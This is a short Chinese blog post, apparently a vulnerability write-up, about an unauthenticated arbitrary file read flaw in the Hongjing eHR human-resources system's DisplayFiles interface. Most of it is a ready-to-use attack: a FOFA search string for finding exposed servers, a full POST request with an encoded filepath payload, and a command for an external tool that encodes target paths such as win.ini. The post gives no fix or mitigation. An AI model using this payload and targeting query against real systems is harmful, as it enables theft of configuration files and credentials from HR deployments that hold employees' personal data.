Babing
Published on 2024-08-30 / 3 Visits
0
0

H1-4宏景-人力资源管理-任意文件读取

H1-4宏景-人力资源管理-任意文件读取

漏洞描述:

宏景eHR DisplayFiles接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

网站图片:

image.png

网络测绘:

fofa语法:

FOFA:app=“HJSOFT-HCM”

漏洞复现:

payload:

POST /templates/attestation/./servlet/DisplayFiles HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filepath=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT

PS:读取文件内容需使用工具编码
工具地址:https://github.com/vaycore/HrmsTool
java -jar HrmsTool.jar -e C:/Windows/win.ini
b2d4d679a99441b49d06c8c940a9f751.png
效果图:


Comment